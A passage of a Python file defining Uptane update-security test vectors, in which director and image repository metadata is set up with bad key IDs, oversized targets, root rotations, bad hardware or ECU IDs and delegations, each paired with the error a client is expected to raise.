'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotBadKeyIdsUptane(Uptane):
'''The image repo root metadata has bad key IDs for the snapshot role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'snapshot_bad_key_ids': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampBadKeyIdsUptane(Uptane):
'''The image repo root metadata has bad key IDs for the timestamp role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'timestamp_bad_key_ids': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetOversizedUptane(Uptane):
'''The director's metadata states that a target is smaller than it actually is.
The target metadata in image and director do not match.
'''
class ImageStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='oversized')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTargetOversizedUptane(Uptane):
'''The image repo's metadata states that a target is smaller than it actually is.
The target metadata in image and director do not match.
'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='oversized')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class TargetOversizedUptane(Uptane):
'''Both the director's and image repo's metadata states that a target is smaller than it
actually is.
'''
class ImageStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetHashMismatch',
}
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='oversized')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'OversizedTarget',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='oversized')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootRotationUptane(Uptane):
'''Director step 0 has root v1, step 1 has root v2, it is correctly cross signed'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep1(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
class DirectorStep2(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [4, 6],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep1, ImageStep),
(DirectorStep2, ImageStep),
]
class ImageRepoRootRotationUptane(Uptane):
'''Image repo step 0 has root v1, step 1 has root v2, it is correctly cross signed'''
class ImageStep1(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class ImageStep2(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [0, 6],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep1),
(DirectorStep, ImageStep2),
]
class DirectorRootRotationNoOriginalSignatureUptane(Uptane):
'''Director step 0 has root v1, step 1 has root v2, it is only signed by the second root
keys
'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep1(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
class DirectorStep2(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [6],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep1, ImageStep),
(DirectorStep2, ImageStep),
]
class ImageRepoRootRotationNoOriginalSignatureUptane(Uptane):
'''Image repo step 0 has root v1, step 1 has root v2, it is only signed by the second root
keys
'''
class ImageStep1(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class ImageStep2(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [6],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep1),
(DirectorStep, ImageStep2),
]
class DirectorRootRotationNoNewSignatureUptane(Uptane):
'''Director step 0 has root v1, step 1 has root v2, it is only signed by the first root
keys
'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep1(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
class DirectorStep2(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep1, ImageStep),
(DirectorStep2, ImageStep),
]
class ImageRepoRootRotationNoNewSignatureUptane(Uptane):
'''Image repo step 0 has root v1, step 1 has root v2, it is only signed by the first root
keys
'''
class ImageStep1(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class ImageStep2(Step):
UPDATE_ERROR = 'UnmetThreshold::Root'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'version': 2,
'root_keys_idx': [6],
'root_sign_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep1),
(DirectorStep, ImageStep2),
]
class DirectorBadHwIdUptane(Uptane):
'''The director targets metadata has a bad hardware ID'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'BadHardwareId',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hw-id')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoBadHwIdUptane(Uptane):
'''The image repo targets metadata has a bad hardware ID'''
class ImageStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hw-id')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class BadHwIdUptane(Uptane):
'''Both targets metadata have a bad hardware ID'''
class ImageStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'BadHardwareId',
}
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hw-id')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'BadHardwareId',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hw-id')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorBadEcuIdUptane(Uptane):
'''The director targets metadata has a bad ECU ID'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'BadEcuId',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-ecu-id')]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': __targets,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotTargetsVersionMismatchUptane(Uptane):
'''The images repo snapshot metadata expects a newer version of the targets metadata'''
class ImageStep(Step):
UPDATE_ERROR = 'VersionMismatch::targets'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'targets_version': 2,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationSimpleUptane(Uptane):
'''The most basic delegation happy case where targets points at one delegation'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationRedundantUptane(Uptane):
'''A target is listed in both the top-level targets and a delegation'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
# Leave the delegation unsigned to create an obvious error so
# that if the delegation were verified, it would fail. However,
# it shouldn't even be downloaded, since the target should be
# found in the top-level Targets.
'targets_sign_keys_idx': [],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
# Leave the default Target in the Targets metadata.
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationPathMismatchUptane(Uptane):
'''The target name does not match the delegated role's path'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
def __delegations(delegations_keys_idx: list = None, **kwargs) -> list:
return [
Delegation(
keys_idx=delegations_keys_idx,
role=Role(
keys_idx=delegations_keys_idx,
name=DEFAULT_DELEGATION_NAME,
paths=['does-not-match'],
terminating=False,
threshold=1,
**kwargs
),
**kwargs
),
]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': __delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationKeyMissingUptane(Uptane):
'''The top-level targets metadata is missing a key ID for a delegated role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
